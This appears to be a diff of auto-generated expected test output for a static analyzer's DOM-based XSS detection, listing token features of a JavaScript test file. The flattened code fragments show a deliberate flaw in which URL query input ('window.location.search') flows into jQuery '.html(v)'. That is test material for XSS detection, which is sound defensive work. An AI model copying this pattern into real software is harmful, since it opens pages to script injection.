module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:29:165:29 | v | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:29:165:29 | v | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:29:165:29 | v | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:29:165:29 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:29:165:29 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:33 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:33 | $ | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:33 | $ | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:33 | $ | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:33 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:42 | $("
    ") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:42 | $("
    ") | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:42 | $("
    ") | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:42 | $("
    ") | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:42 | $("
    ") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:42 | exceptional return of $("
    ") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:42 | exceptional return of $("
    ") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:42 | exceptional return of $("
    ") | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:42 | exceptional return of $("
    ") | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:42 | exceptional return of $("
    ") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:47 | $("
    ").html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:47 | $("
    ").html | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:47 | $("
    ").html | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:47 | $("
    ").html | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:47 | $("
    ").html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:50 | $("
    ").html(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:50 | $("
    ").html(v) | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:50 | $("
    ").html(v) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:50 | $("
    ").html(v) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:50 | $("
    ").html(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:50 | exceptional return of $("
    ").html(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:50 | exceptional return of $("
    ").html(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:50 | exceptional return of $("
    ").html(v) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:50 | exceptional return of $("
    ").html(v) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:33:165:50 | exceptional return of $("
    ").html(v) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:165:35:165:41 | "
    " | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:165:35:165:41 | "
    " | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:165:35:165:41 | "
    " | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16703,6 +115731,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:165:35:165:41 | "
    " | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:165:35:165:41 | "
    " | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:165:35:165:41 | "
    " | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:44:165:47 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:44:165:47 | html | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:165:44:165:47 | html | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:44:165:47 | html | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:44:165:47 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:165:49:165:49 | v | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:165:49:165:49 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:165:49:165:49 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16710,6 +115743,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:165:49:165:49 | v | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:165:49:165:49 | v | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:165:49:165:49 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:168:10:168:16 | factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:10:168:16 | factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:168:10:168:16 | factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:10:168:16 | factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:168:10:168:16 | factory | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:168:18:168:46 | "innoce ... ervice" | CalleeFlexibleAccessPath | angular.module().factory().factory().factory().factory().factory().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:168:18:168:46 | "innoce ... ervice" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:168:18:168:46 | "innoce ... ervice" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16725,15 +115763,85 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:168:49:170:10 | ["innoc ... }] | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:168:49:170:10 | ["innoc ... }] | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:168:50:168:72 | "innoce ... ervice" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:50:168:72 | "innoce ... ervice" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:50:168:72 | "innoce ... ervice" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:168:50:168:72 | "innoce ... ervice" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:168:50:168:72 | "innoce ... ervice" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:50:168:72 | "innoce ... ervice" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:50:168:72 | "innoce ... ervice" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:168:50:168:72 | "innoce ... ervice" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:168:50:168:72 | "innoce ... ervice" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:168:50:168:72 | "innoce ... ervice" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:168:74 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:168:74 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:168:74 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:168:74 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:168:74 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | functio ... } | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | functio ... } | contextSurroundingFunctionParameters | ()\n(innocentSourceService) | | 